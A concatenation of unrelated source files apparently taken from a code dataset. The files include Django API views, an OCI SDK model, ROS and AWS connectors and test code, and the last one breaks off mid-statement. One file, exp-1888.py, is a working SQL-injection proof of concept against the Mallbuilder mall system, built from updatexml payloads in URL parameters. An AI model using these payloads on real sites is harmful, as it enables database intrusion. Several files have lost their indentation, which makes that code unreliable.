    e.g. 'ABBBB' -> '1A4B'."""
    encoded_message = ""
    i = 0
    while i < len(message):
        # start a new run at position i
        count = 1
        ch = message[i]
        j = i
        # extend the run while the next character matches
        while j < len(message) - 1 and message[j] == message[j + 1]:
            count += 1
            j += 1
        encoded_message += str(count) + ch
        i = j + 1
    return encoded_message
#Provide different values for message and test your program
encoded_message = encode("ABBBBCCCCCCCCAB")
print(encoded_message)
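# Illustrative companion (an addition, not in the original file): invert
# encode by reading a possibly multi-digit count, then the character it
# repeats. Assumes the encoded characters are themselves non-digits.
def decode(encoded_message):
    decoded = ""
    count_digits = ""
    for ch in encoded_message:
        if ch.isdigit():
            count_digits += ch
        else:
            decoded += ch * int(count_digits)
            count_digits = ""
    return decoded

print(decode(encoded_message))  # ABBBBCCCCCCCCAB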
| 3.78125 | 4 |
capstone/capapi/views/api_views.py | jcushman/capstone | 0 | 12759613 | import re
import urllib
from collections import OrderedDict
from django.http import HttpResponseRedirect, FileResponse
from django.utils.text import slugify
from rest_framework import viewsets, renderers, mixins
from rest_framework.decorators import action
from rest_framework.exceptions import ValidationError
from rest_framework.response import Response
from rest_framework.reverse import reverse
from capapi.middleware import add_cache_header
from capdb import models
from capapi import serializers, filters, permissions, pagination
from capapi import renderers as capapi_renderers
from capdb.models import Citation
from django_elasticsearch_dsl_drf.constants import (
LOOKUP_FILTER_RANGE,
LOOKUP_QUERY_IN,
LOOKUP_QUERY_GT,
LOOKUP_QUERY_GTE,
LOOKUP_QUERY_LT,
LOOKUP_QUERY_LTE,
)
from django_elasticsearch_dsl_drf.filter_backends import (
FilteringFilterBackend,
IdsFilterBackend,
OrderingFilterBackend,
DefaultOrderingFilterBackend,
SearchFilterBackend,
)
from django_elasticsearch_dsl_drf.viewsets import BaseDocumentViewSet
from django_elasticsearch_dsl_drf.pagination import PageNumberPagination
from capapi.documents import CaseDocument
from capapi.serializers import CaseDocumentSerializer
class BaseViewSet(viewsets.ReadOnlyModelViewSet):
http_method_names = ['get']
class JurisdictionViewSet(BaseViewSet):
serializer_class = serializers.JurisdictionSerializer
filterset_class = filters.JurisdictionFilter
queryset = models.Jurisdiction.objects.order_by('name', 'pk')
lookup_field = 'slug'
class VolumeViewSet(BaseViewSet):
serializer_class = serializers.VolumeSerializer
queryset = models.VolumeMetadata.objects.order_by('pk').select_related(
'reporter'
).prefetch_related('reporter__jurisdictions')
class ReporterViewSet(BaseViewSet):
serializer_class = serializers.ReporterSerializer
filterset_class = filters.ReporterFilter
queryset = models.Reporter.objects.order_by('full_name', 'pk').prefetch_related('jurisdictions')
class CourtViewSet(BaseViewSet):
serializer_class = serializers.CourtSerializer
filterset_class = filters.CourtFilter
queryset = models.Court.objects.order_by('name', 'pk').select_related('jurisdiction')
lookup_field = 'slug'
class CitationViewSet(BaseViewSet):
serializer_class = serializers.CitationWithCaseSerializer
queryset = models.Citation.objects.order_by('pk')
class CaseViewSet(BaseViewSet):
serializer_class = serializers.CaseSerializer
queryset = models.CaseMetadata.objects.in_scope().select_related(
'volume',
'reporter',
).prefetch_related(
'citations'
).order_by(
'decision_date', 'id' # include id to get consistent ordering for cases with same date
)
renderer_classes = (
renderers.JSONRenderer,
capapi_renderers.BrowsableAPIRenderer,
capapi_renderers.XMLRenderer,
capapi_renderers.HTMLRenderer,
)
filterset_class = filters.CaseFilter
lookup_field = 'id'
def is_full_case_request(self):
        return self.request.query_params.get('full_case', 'false').lower() == 'true'
def get_queryset(self):
if self.is_full_case_request():
return self.queryset.select_related('case_xml', 'body_cache')
else:
return self.queryset
def get_serializer_class(self, *args, **kwargs):
if self.is_full_case_request():
return serializers.CaseSerializerWithCasebody
else:
return self.serializer_class
def list(self, *args, **kwargs):
jur_value = self.request.query_params.get('jurisdiction', None)
jur_slug = slugify(jur_value)
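        # e.g. a human-readable value like 'New York' is normalized to the
        # slug 'new-york' before comparing and redirecting (illustrative).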
if not jur_value or jur_slug == jur_value:
return super(CaseViewSet, self).list(*args, **kwargs)
query_string = urllib.parse.urlencode(dict(self.request.query_params, jurisdiction=jur_slug), doseq=True)
new_url = reverse('casemetadata-list') + "?" + query_string
return HttpResponseRedirect(new_url)
def retrieve(self, *args, **kwargs):
# for user's convenience, if user gets /cases/casecitation or /cases/Case Citation (or any non-numeric value)
# we redirect to /cases/?cite=casecitation
id = kwargs[self.lookup_field]
if re.search(r'\D', id):
normalized_cite = Citation.normalize_cite(id)
query_string = urllib.parse.urlencode(dict(self.request.query_params, cite=normalized_cite), doseq=True)
new_url = reverse('casemetadata-list') + "?" + query_string
return HttpResponseRedirect(new_url)
return super(CaseViewSet, self).retrieve(*args, **kwargs)
class CaseDocumentViewSet(BaseDocumentViewSet):
"""The CaseDocument view."""
document = CaseDocument
serializer_class = CaseDocumentSerializer
pagination_class = PageNumberPagination
lookup_field = 'id'
filter_backends = [
FilteringFilterBackend,
IdsFilterBackend,
OrderingFilterBackend,
DefaultOrderingFilterBackend,
SearchFilterBackend,
]
# Define search fields
search_fields = (
'case_body__data__text',
'name',
'jurisdiction__name_long',
'court__name',
)
# Define filter fields
filter_fields = {
'id': {
'field': 'id',
            # Note that we limit the lookups of the id field in this example,
# to `range`, `in`, `gt`, `gte`, `lt` and `lte` filters.
'lookups': [
LOOKUP_FILTER_RANGE,
LOOKUP_QUERY_IN,
LOOKUP_QUERY_GT,
LOOKUP_QUERY_GTE,
LOOKUP_QUERY_LT,
LOOKUP_QUERY_LTE,
],
},
'name': 'name',
}
# Define ordering fields
ordering_fields = {
'decision_date': 'decision_date',
'name_abbreviation': 'name_abbreviation.raw',
'id': 'id',
}
# Specify default ordering
ordering = ('decision_date', 'name_abbreviation', 'id',)
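    # Illustrative request this configuration supports (URL is hypothetical):
    #   /cases/?search=contract&id__gte=100&ordering=-decision_date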
def is_full_case_request(self):
        return self.request.query_params.get('full_case', 'false').lower() == 'true'
def get_serializer_class(self, *args, **kwargs):
if self.is_full_case_request():
return serializers.CaseDocumentSerializerWithCasebody
else:
return self.serializer_class
class CaseExportViewSet(BaseViewSet):
serializer_class = serializers.CaseExportSerializer
queryset = models.CaseExport.objects.order_by('pk')
filterset_class = filters.CaseExportFilter
def list(self, request, *args, **kwargs):
# mark list requests to filter out superseded downloads by default
self.request.hide_old_by_default = True
return super().list(request, *args, **kwargs)
def filter_queryset(self, queryset):
queryset = super().filter_queryset(queryset)
# filter out superseded downloads for list requests unless with_old=true
try:
if self.request.hide_old_by_default and self.request.GET.get('with_old') != 'true':
queryset = queryset.exclude_old()
except AttributeError:
pass
return queryset
@action(
methods=['get'],
detail=True,
renderer_classes=(capapi_renderers.PassthroughRenderer,),
permission_classes=(permissions.CanDownloadCaseExport,),
)
def download(self, *args, **kwargs):
instance = self.get_object()
# send file
response = FileResponse(instance.file.open(), content_type='application/zip')
response['Content-Length'] = instance.file.size
response['Content-Disposition'] = 'attachment; filename="%s"' % instance.file_name
# public downloads are cacheable
if instance.public:
add_cache_header(response)
return response
class NgramViewSet(mixins.ListModelMixin, viewsets.GenericViewSet):
http_method_names = ['get']
queryset = models.Ngram.objects.order_by('pk').select_related('w1', 'w2', 'w3')
filterset_class = filters.NgramFilter
pagination_class = pagination.SmallCapPagination
renderer_classes = (
renderers.JSONRenderer,
capapi_renderers.NgramBrowsableAPIRenderer,
)
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# cache translation table between jurisdiction slug and ID
        self.jurisdiction_id_to_slug = {v: k for k, v in filters.jurisdiction_slug_to_id.items()}
self.jurisdiction_id_to_slug[None] = 'total'
def list(self, request, *args, **kwargs):
# without specific ngram search, return nothing
q = self.request.GET.get('q', '').strip()
if not q:
return Response({})
# fetch all unique ngrams for query, and paginate
queryset = self.filter_queryset(self.get_queryset())
page = self.paginate_queryset(queryset)
# get counts for each ngram
out = OrderedDict()
if page:
# build lookup table
ngrams_by_id = {}
for ngram in page:
out[str(ngram)] = ngrams_by_id[ngram.pk] = {}
# fetch all observations, using same query parameters
observations = models.NgramObservation.objects.filter(ngram__in=page)
obs_filter = filters.NgramObservationFilter(data=request.query_params, queryset=observations, request=request)
if not obs_filter.is_valid():
                raise ValueError(obs_filter.errors)  # .errors is a dict, not an exception
observations = list(obs_filter.qs.values_list('ngram_id', 'jurisdiction_id', 'year', 'instance_count', 'document_count'))
# sort with None values first
observations.sort(key=lambda x: [[y is not None, y] for y in x])
# organize all observations by ngram, then jurisdiction, then year
for ngram_id, jurisdiction_id, year, instance_count, document_count in observations:
jurs = ngrams_by_id[ngram_id]
jurisdiction_slug = self.jurisdiction_id_to_slug[jurisdiction_id]
if jurisdiction_slug not in jurs:
jurs[jurisdiction_slug] = OrderedDict()
years = jurs[jurisdiction_slug]
years[year or "total"] = [instance_count, document_count]
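            # Illustrative result shape (ngram/years invented):
            # {"fair use": {"total": {"total": [123, 45], "1980": [3, 2]}}}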
return self.get_paginated_response(out)
| 1.804688 | 2 |
src/oci/osp_gateway/models/invoice_line_summary.py | LaudateCorpus1/oci-python-sdk | 0 | 12759614 | # coding: utf-8
# Copyright (c) 2016, 2022, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401
from oci.decorators import init_model_state_from_kwargs
@init_model_state_from_kwargs
class InvoiceLineSummary(object):
"""
Product items of the invoice
"""
def __init__(self, **kwargs):
"""
Initializes a new InvoiceLineSummary object with values from keyword arguments.
The following keyword arguments are supported (corresponding to the getters/setters of this class):
:param product:
The value to assign to the product property of this InvoiceLineSummary.
:type product: str
:param order_no:
The value to assign to the order_no property of this InvoiceLineSummary.
:type order_no: str
:param part_number:
The value to assign to the part_number property of this InvoiceLineSummary.
:type part_number: str
:param time_start:
The value to assign to the time_start property of this InvoiceLineSummary.
:type time_start: datetime
:param time_end:
The value to assign to the time_end property of this InvoiceLineSummary.
:type time_end: datetime
:param quantity:
The value to assign to the quantity property of this InvoiceLineSummary.
:type quantity: float
:param net_unit_price:
The value to assign to the net_unit_price property of this InvoiceLineSummary.
:type net_unit_price: float
:param total_price:
The value to assign to the total_price property of this InvoiceLineSummary.
:type total_price: float
:param currency:
The value to assign to the currency property of this InvoiceLineSummary.
:type currency: oci.osp_gateway.models.Currency
"""
self.swagger_types = {
'product': 'str',
'order_no': 'str',
'part_number': 'str',
'time_start': 'datetime',
'time_end': 'datetime',
'quantity': 'float',
'net_unit_price': 'float',
'total_price': 'float',
'currency': 'Currency'
}
self.attribute_map = {
'product': 'product',
'order_no': 'orderNo',
'part_number': 'partNumber',
'time_start': 'timeStart',
'time_end': 'timeEnd',
'quantity': 'quantity',
'net_unit_price': 'netUnitPrice',
'total_price': 'totalPrice',
'currency': 'currency'
}
self._product = None
self._order_no = None
self._part_number = None
self._time_start = None
self._time_end = None
self._quantity = None
self._net_unit_price = None
self._total_price = None
self._currency = None
@property
def product(self):
"""
**[Required]** Gets the product of this InvoiceLineSummary.
Product of the item
:return: The product of this InvoiceLineSummary.
:rtype: str
"""
return self._product
@product.setter
def product(self, product):
"""
Sets the product of this InvoiceLineSummary.
Product of the item
:param product: The product of this InvoiceLineSummary.
:type: str
"""
self._product = product
@property
def order_no(self):
"""
Gets the order_no of this InvoiceLineSummary.
Product of the item
:return: The order_no of this InvoiceLineSummary.
:rtype: str
"""
return self._order_no
@order_no.setter
def order_no(self, order_no):
"""
Sets the order_no of this InvoiceLineSummary.
Product of the item
:param order_no: The order_no of this InvoiceLineSummary.
:type: str
"""
self._order_no = order_no
@property
def part_number(self):
"""
Gets the part_number of this InvoiceLineSummary.
Part number
:return: The part_number of this InvoiceLineSummary.
:rtype: str
"""
return self._part_number
@part_number.setter
def part_number(self, part_number):
"""
Sets the part_number of this InvoiceLineSummary.
Part number
:param part_number: The part_number of this InvoiceLineSummary.
:type: str
"""
self._part_number = part_number
@property
def time_start(self):
"""
Gets the time_start of this InvoiceLineSummary.
Start date
:return: The time_start of this InvoiceLineSummary.
:rtype: datetime
"""
return self._time_start
@time_start.setter
def time_start(self, time_start):
"""
Sets the time_start of this InvoiceLineSummary.
Start date
:param time_start: The time_start of this InvoiceLineSummary.
:type: datetime
"""
self._time_start = time_start
@property
def time_end(self):
"""
Gets the time_end of this InvoiceLineSummary.
End date
:return: The time_end of this InvoiceLineSummary.
:rtype: datetime
"""
return self._time_end
@time_end.setter
def time_end(self, time_end):
"""
Sets the time_end of this InvoiceLineSummary.
End date
:param time_end: The time_end of this InvoiceLineSummary.
:type: datetime
"""
self._time_end = time_end
@property
def quantity(self):
"""
Gets the quantity of this InvoiceLineSummary.
Quantity of the ordered product
:return: The quantity of this InvoiceLineSummary.
:rtype: float
"""
return self._quantity
@quantity.setter
def quantity(self, quantity):
"""
Sets the quantity of this InvoiceLineSummary.
Quantity of the ordered product
:param quantity: The quantity of this InvoiceLineSummary.
:type: float
"""
self._quantity = quantity
@property
def net_unit_price(self):
"""
Gets the net_unit_price of this InvoiceLineSummary.
Unit price of the ordered product
:return: The net_unit_price of this InvoiceLineSummary.
:rtype: float
"""
return self._net_unit_price
@net_unit_price.setter
def net_unit_price(self, net_unit_price):
"""
Sets the net_unit_price of this InvoiceLineSummary.
Unit price of the ordered product
:param net_unit_price: The net_unit_price of this InvoiceLineSummary.
:type: float
"""
self._net_unit_price = net_unit_price
@property
def total_price(self):
"""
Gets the total_price of this InvoiceLineSummary.
Total price of the ordered product (Net unit price x quantity)
:return: The total_price of this InvoiceLineSummary.
:rtype: float
"""
return self._total_price
@total_price.setter
def total_price(self, total_price):
"""
Sets the total_price of this InvoiceLineSummary.
Total price of the ordered product (Net unit price x quantity)
:param total_price: The total_price of this InvoiceLineSummary.
:type: float
"""
self._total_price = total_price
@property
def currency(self):
"""
Gets the currency of this InvoiceLineSummary.
:return: The currency of this InvoiceLineSummary.
:rtype: oci.osp_gateway.models.Currency
"""
return self._currency
@currency.setter
def currency(self, currency):
"""
Sets the currency of this InvoiceLineSummary.
:param currency: The currency of this InvoiceLineSummary.
:type: oci.osp_gateway.models.Currency
"""
self._currency = currency
def __repr__(self):
return formatted_flat_dict(self)
def __eq__(self, other):
if other is None:
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other
| 2.375 | 2 |
building/smallCrater.py | cssidy/minecraft-hacks | 1 | 12759615 | from mcpi.minecraft import Minecraft
mc = Minecraft.create()
answer = input("Create a crater? Y/N ")
if answer == "Y":
pos = mc.player.getPos()
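    # hollow out a 3x3x3 cube of air (block id 0) centred on the player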
mc.setBlocks(pos.x + 1, pos.y + 1, pos.z + 1, pos.x - 1, pos.y - 1, pos.z - 1, 0)
mc.postToChat("Boom!")
| 2.890625 | 3 |
src/selfie_app_communication/scripts/app_communication.py | KNR-Selfie/selfie_carolocup2020 | 10 | 12759616 | #!/usr/bin/env python3
import rospy
import bluetooth as bt
import select
import threading
from std_srvs.srv import Empty
import dynamic_reconfigure.client
from struct import pack, unpack
class Communicator:
def __init__(self):
self.connections = []
self.port = 1
self.server_socket = bt.BluetoothSocket(bt.RFCOMM)
self.server_socket.bind(("", self.port))
self.server_socket.listen(7)
self.pidClient = dynamic_reconfigure.client.Client('controller')
self.server_socket.setblocking(False)
BTThread = threading.Thread(name="BTthread", target=self.BTfun)
self.resetVisionService = rospy.ServiceProxy('resetVision', Empty)
BTThread.start()
#a = rospy.get_param("~operations")
#print a
def BTfun(self):
while not rospy.is_shutdown():
            readable, writable, _ = select.select(self.connections + [self.server_socket], self.connections, [], 0.01)
if self.server_socket in readable:
                try:
                    remote_socket, (address, _) = self.server_socket.accept()
                except bt.BluetoothError:
                    print("couldn't accept the connection")
                except Exception:
                    print("unexpected error while accepting a connection")
                else:
                    print("connected to " + bt.lookup_name(address))
                    self.connections.append(remote_socket)
                readable.remove(self.server_socket)
#endif
            for read in readable:
                try:
                    data = read.recv(5000)
                    print(data[:3] == b'\x01\x01\x01')  # debug: is this a Kp frame?
                    if data == b"resetVision":
                        print(data)
                        self.resetVisionService()
                    elif data[:3] == b'\x01\x01\x01':
                        self.pidClient.update_configuration({'Kp': float(unpack('f', data[3:])[0])})
                    elif data[:3] == b'\x01\x01\x02':
                        self.pidClient.update_configuration({'Ki': float(unpack('f', data[3:])[0])})
                    elif data[:3] == b'\x01\x01\x03':
                        self.pidClient.update_configuration({'Kd': float(unpack('f', data[3:])[0])})
                except bt.BluetoothError:
                    print("disconnected")
                    self.connections.remove(read)
                except Exception:
                    print("unexpected error while receiving")
                else:
                    print("received", data)
rospy.init_node("omega")
communicator = Communicator()
rospy.spin()
| 2.609375 | 3 |
tests/test_batch.py | mohi7solanki/NZ-ORCID-Hub | 0 | 12759617 | <gh_stars>0
# -*- coding: utf-8 -*-
"""Tests for batch processing."""
from datetime import datetime
from unittest.mock import Mock, patch
import pytest
from flask_login import login_user
from peewee import Model, SqliteDatabase
from playhouse.test_utils import test_database
from orcid_hub import utils
from orcid_hub.models import (Affiliation, AffiliationRecord, ModelException, OrcidToken,
Organisation, OrgInfo, PartialDate, PartialDateField, Role, Task,
TaskType, User, UserOrg, UserOrgAffiliation, create_tables,
drop_tables)
def test_process_task_from_csv_with_failures(request_ctx):
"""Test task loading and processing with failures."""
org = Organisation.get(name="TEST0")
super_user = User.get(email="<EMAIL>")
with patch("emails.html") as mock_msg, request_ctx("/") as ctx:
login_user(super_user)
# flake8: noqa
task = Task.load_from_csv(
"""First name Last name email address Organisation Campus/Department City Course or Job title Start date End date Student/Staff
FNA LBA <EMAIL> TEST1 Research Funding Wellington Programme Manager - ORCID 2016-09 Staff
""",
filename="TEST.tsv",
org=org)
AffiliationRecord.update(is_active=True).where(
AffiliationRecord.task_id == task.id).execute()
mock_msg().send = Mock(side_effect=Exception("FAILED TO SEND EMAIL"))
utils.process_affiliation_records(10000)
rec = AffiliationRecord.select().where(AffiliationRecord.task_id == task.id).first()
assert "FAILED TO SEND EMAIL" in rec.status
assert rec.processed_at is not None
def test_upload_affiliation_with_wrong_country(request_ctx, mocker):
"""Test task loading and processing with failures."""
org = Organisation.get(name="TEST0")
super_user = User.get(email="<EMAIL>")
with request_ctx("/") as ctx:
exception = mocker.patch.object(ctx.app.logger, "exception")
login_user(super_user)
# flake8: noqa
with pytest.raises(ModelException):
task = Task.load_from_csv(
"""First name\tLast name\temail address\tOrganisation\tCampus/Department\tCity\tCourse or Job title\tStart date\tEnd date\tStudent/Staff\tCountry
FNA\tLBA\<EMAIL>\tTEST1\tResearch Funding\tWellington\tProgramme Manager - ORCID\t2016-09 19:00:00 PM\t\tStaff\tNO COUNTRY
""",
filename="TEST.tsv",
org=org)
# this should work:
task = Task.load_from_csv(
"""First name\tLast name\temail address\tOrganisation\tCampus/Department\tCity\tCourse or Job title\tStart date\tEnd date\tStudent/Staff\tCountry
FNA\tLBA\taaa.<EMAIL>.com\tTEST1\tResearch Funding\tWellington\tProgramme Manager - ORCID\t2016-09 19:00:00 PM\t\tStaff\t
""",
filename="TEST-2.tsv",
org=org)
rec = task.records.first()
assert rec.country is None
exception.assert_called_once()
def test_process_tasks(request_ctx):
"""Test expiration data setting and deletion of the exprired tasks."""
org = Organisation.get(name="TEST0")
super_user = User.get(email="<EMAIL>")
with patch("orcid_hub.utils.send_email") as send_email, request_ctx("/") as ctx:
login_user(super_user)
# flake8: noqa
task = Task.load_from_csv(
"""First name Last name email address Organisation Campus/Department City Course or Job title\tStart date End date Student/Staff\tCountry
FNA LBA <EMAIL> TEST1 Research Funding Wellington Programme Manager - ORCID 2016-09 Staff\tNew Zealand
""",
filename="TEST_TASK.tsv",
org=org)
Task.update(created_at=datetime(1999, 1, 1), updated_at=datetime(1999, 1, 1)).execute()
utils.process_tasks()
assert Task.select().count() == 1
assert not Task.select().where(Task.expires_at.is_null()).exists()
send_email.assert_called_once()
task = Task.select().first()
args, kwargs = send_email.call_args
assert "email/task_expiration.html" in args
assert kwargs["error_count"] == 0
hostname = ctx.request.host
assert kwargs["export_url"].endswith(
f"//{hostname}/admin/affiliationrecord/export/csv/?task_id={task.id}")
assert kwargs["recipient"] == (
super_user.name,
super_user.email,
)
assert kwargs["subject"] == "Batch process task is about to expire"
assert kwargs["task"] == task
# After the second go everything should be deleted
utils.process_tasks()
assert Task.select().count() == 0
# Funding processing task:
task = Task.create(
created_at=datetime(1999, 1, 1),
org=org,
filename="FUNDING.json",
created_by=super_user,
updated_by=super_user,
task_type=TaskType.FUNDING.value)
Task.update(updated_at=datetime(1999, 1, 1)).execute()
assert Task.select().where(Task.expires_at.is_null()).count() == 1
utils.process_tasks()
assert Task.select().count() == 1
assert Task.select().where(Task.expires_at.is_null()).count() == 0
utils.process_tasks()
assert Task.select().count() == 0
args, kwargs = send_email.call_args
assert "email/task_expiration.html" in args
assert kwargs["error_count"] == 0
hostname = ctx.request.host
assert kwargs["export_url"].endswith(
f"//{hostname}/admin/fundingrecord/export/csv/?task_id={task.id}")
assert kwargs["recipient"] == (
super_user.name,
super_user.email,
)
assert kwargs["subject"] == "Batch process task is about to expire"
assert kwargs["task"] == task
# Incorrect task type:
task = Task.create(
created_at=datetime(1999, 1, 1),
org=org,
filename="ERROR.err",
created_by=super_user,
updated_by=super_user,
task_type=-12345)
Task.update(updated_at=datetime(1999, 1, 1)).execute()
    # pytest>=5 removed the message= kwarg; match= asserts on the exception
    # text (the "Unexpeced" typo mirrors the message raised by the code under test)
    with pytest.raises(Exception, match=r"Unexpeced task type: -12345"):
utils.process_tasks()
task.delete().execute()
# Cover case with an exterenal SP:
with patch("orcid_hub.utils.EXTERNAL_SP", "SOME.EXTERNAL.SP"):
Task.create(
created_at=datetime(1999, 1, 1),
org=org,
filename="FILE.file",
created_by=super_user,
updated_by=super_user)
Task.update(updated_at=datetime(1999, 1, 1)).execute()
assert Task.select().count() == 1
utils.process_tasks()
utils.process_tasks()
assert Task.select().count() == 0
| 2.265625 | 2 |
src/spaceone/inventory/connector/aws_sqs_connector/connector.py | xellos00/plugin-aws-cloud-services | 2 | 12759618 | import time
import logging
from typing import List
import json
from spaceone.inventory.connector.aws_sqs_connector.schema.data import QueData, RedrivePolicy
from spaceone.inventory.connector.aws_sqs_connector.schema.resource import SQSResponse, QueResource
from spaceone.inventory.connector.aws_sqs_connector.schema.service_type import CLOUD_SERVICE_TYPES
from spaceone.inventory.libs.connector import SchematicAWSConnector
_LOGGER = logging.getLogger(__name__)
class SQSConnector(SchematicAWSConnector):
service_name = 'sqs'
def get_resources(self) -> List[SQSResponse]:
print("** SQS START **")
resources = []
start_time = time.time()
collect_resource = {
'request_method': self.request_data,
'resource': QueResource,
'response_schema': SQSResponse
}
# init cloud service type
for cst in CLOUD_SERVICE_TYPES:
resources.append(cst)
# merge data
for region_name in self.region_names:
self.reset_region(region_name)
resources.extend(self.collect_data_by_region(self.service_name, region_name, collect_resource))
print(f' SQS Finished {time.time() - start_time} Seconds')
return resources
def request_data(self, region_name) -> List[QueData]:
resource = self.session.resource('sqs')
for que in resource.queues.all():
attr = que.attributes
if 'RedrivePolicy' in attr:
attr['RedrivePolicy'] = RedrivePolicy(json.loads(attr.get('RedrivePolicy')), strict=False)
result = QueData(attr)
result.region_name = region_name
result.url = que.url
result.account_id = self.account_id
yield result, result.name
| 2.125 | 2 |
bin/_context.py | sjtuzyk/chandra-acis-analysis | 3 | 12759619 | <gh_stars>1-10
# Copyright (c) 2017 <NAME> <<EMAIL>>
# MIT license
"""
Portal to 'acispy' module/package
"""
import os
import sys
sys.path.insert(
0,
os.path.abspath(os.path.join(os.path.dirname(__file__), ".."))
)
import acispy
| 1.296875 | 1 |
stcSeg/checkpoint/__init__.py | ylqi/STC-Seg | 0 | 12759620 | <filename>stcSeg/checkpoint/__init__.py
from .stcseg_checkpoint import STCSegCheckpointer
__all__ = ["STCSegCheckpointer"]
| 1.140625 | 1 |
Bugscan_exploits-master/exp_list/exp-1888.py | csadsl/poc_exp | 11 | 12759621 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#POC Name : Mallbuilder mall system SQL injections #2, #3 and #4
#Author : a
#mail : <EMAIL>
#Referer : http://www.wooyun.org/bugs/wooyun-2014-080751
def assign(service, arg):
if service == "mallbuilder":
return True, arg
def audit(arg):
payloads=['?m=product&s=list&key=%27%20and%201=updateXml%281,concat%280x5c,md5%283.14%29%29,1%29%23',
'?m=shop&id=&province=%27%20and%201=updatexml%281,concat%280x5c,md5%283.14%29%29,1%29%23',
'?m=product&s=list&ptype=0%27%20%20and%201=updatexml%281,concat%280x5c,md5%283.14%29%29,1%29%23']
for payload in payloads:
url = arg + payload
code, head, res, errcode,finalurl = curl.curl2(url)
if code == 200 and "4beed3b9c4a886067de0e3a094246f7" in res:
security_hole(url)
if __name__ == '__main__':
from dummy import *
audit(assign('mallbuilder', 'http://www.eseein.com/')[1]) | 2.1875 | 2 |
querybuilder/views.py | jgeskens/bo-querybuilder | 0 | 12759622 | from __future__ import unicode_literals
import importlib
import inspect
import json
from django.conf import settings
from django.contrib import messages
from django.db.models.base import ModelBase
from django.http.response import HttpResponse
from django.shortcuts import get_object_or_404
from django.utils.text import slugify
from django.utils.timezone import now
from django.utils.translation import ugettext
from advanced_reports.backoffice.base import BackOfficeView
from .models import SavedQuery
from .builder import QueryBuilder
class QueryBuilderView(BackOfficeView):
template = 'backoffice/views/querybuilder.html'
def __init__(self):
qb_models = self.get_models_from_settings()
self.qb = QueryBuilder(models=qb_models)
def get_models_from_settings(self):
model_paths = getattr(settings, 'QUERYBUILDER_MODELS', [])
qb_models = []
for model_path in model_paths:
module_path, model_name = model_path.rsplit('.', 1)
module = importlib.import_module(module_path)
if model_name == '*':
model_classes = inspect.getmembers(module, lambda c: type(c) == ModelBase)
for model_tuple in model_classes:
qb_models.append(getattr(module, model_tuple[0]))
else:
model = getattr(module, model_name)
qb_models.append(model)
return qb_models
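    # Hedged settings sketch (app/model names invented): each entry is a
    # dotted path, and a trailing ".*" pulls in every model from that module:
    #   QUERYBUILDER_MODELS = ["myapp.models.Invoice", "shop.models.*"]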
def get_models(self, request):
return self.qb.get_models()
def execute_query(self, request):
id = request.action_params.get('id')
query = request.action_params.get('query')
if id is not None:
sq = SavedQuery.objects.get(pk=int(id))
sq.last_run = now()
sq.save()
return self.qb.run(query)
def save_query(self, request):
query = request.action_params.get('query')
name = request.action_params.get('name')
existing_id = request.action_params.get('id')
if existing_id is not None:
sq = SavedQuery.objects.get(pk=existing_id)
sq.name = name
sq.query = json.dumps(query, indent=2)
sq.save()
else:
sq = SavedQuery.objects.create(
name=name,
query=json.dumps(query, indent=2),
created_by=request.user
)
messages.success(request, ugettext('Successfully saved query "%s"') % name)
return sq.serialize()
def get_saved_queries(self, request):
queries = SavedQuery.objects.filter(created_by=request.user).order_by('-last_run')
return {'queries': [query.serialize() for query in queries]}
def delete_query(self, request):
id = request.action_params.get('id')
sq = SavedQuery.objects.get(pk=int(id))
sq.delete()
messages.success(request, ugettext('Successfully deleted query "%s"') % sq.name)
def export_to_excel(self, request):
id = int(request.GET.get('id'))
sq = get_object_or_404(SavedQuery, pk=int(id))
query = json.loads(sq.query)
result = self.qb.run(query, stream=True)
import xlsxwriter
import StringIO
output = StringIO.StringIO()
wb = xlsxwriter.Workbook(filename=output, options=dict(in_memory=True))
ws = wb.add_worksheet()
for c, value in enumerate(query['values']):
ws.write(0, c, value.get('label', value['expression']))
ws.set_column(0, len(query['values'])-1, width=20)
for r, obj in enumerate(result['objects']):
for c, value in enumerate(query['values']):
ws.write(r + 1, c, obj[value['expression']])
wb.close()
output.seek(0)
filename = '%s.xlsx' % slugify(sq.name)
response = HttpResponse()
response['Content-Disposition'] = 'attachment; filename="%s"' % filename
response['Content-Type'] = 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
response.write(output.read())
return response
| 2 | 2 |
src/installer/src/tortuga/boot/distro/redhat/centos7.py | sutasu/tortuga | 33 | 12759623 | # Copyright 2008-2018 Univa Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import subprocess
from typing import Dict
from jinja2 import Template
from tempfile import NamedTemporaryFile, TemporaryDirectory
from .base import RedHatFamily, RedHatFamilyPrimitives, REPO_CONFIGURATION_TEMPLATE
class CentOs7Primitives(RedHatFamilyPrimitives):
"""
Represent locations of needed primitives
from the CentOS 7 distributions.
"""
def __new__(cls) -> Dict[str, str]:
"""
:return: None
"""
return super(CentOs7Primitives, cls).__new__(cls, rpm_gpg_key='<KEY>')
class CentOs7(RedHatFamily):
"""
Represents a CentOS 7 distribution.
"""
__abstract__: bool = False
def __init__(self, source_path: str, architecture: str = 'x86_64') -> None:
"""
:param source_path: String local path or remote uri
:param architecture: String targeted architecture
:returns: None
"""
super(CentOs7, self).__init__(
source_path,
'centos',
7,
0,
architecture
)
self._primitives: CentOs7Primitives = CentOs7Primitives()
def _update_version(self) -> None:
"""
:return: None
"""
template: Template = Template(REPO_CONFIGURATION_TEMPLATE)
if self.is_remote:
context: Dict[str, str] = {
'base_url': self._source_path,
'gpg_key': os.path.join(self._source_path, self._primitives['rpm_gpg_key'])
}
else:
            context = {
'base_url': 'file://{}'.format(self._source_path),
'gpg_key': 'file://{}'.format(os.path.join(self._source_path, self._primitives['rpm_gpg_key']))
}
rendered: str = template.render(context)
with TemporaryDirectory() as repo_directory:
with NamedTemporaryFile() as repo_configuration:
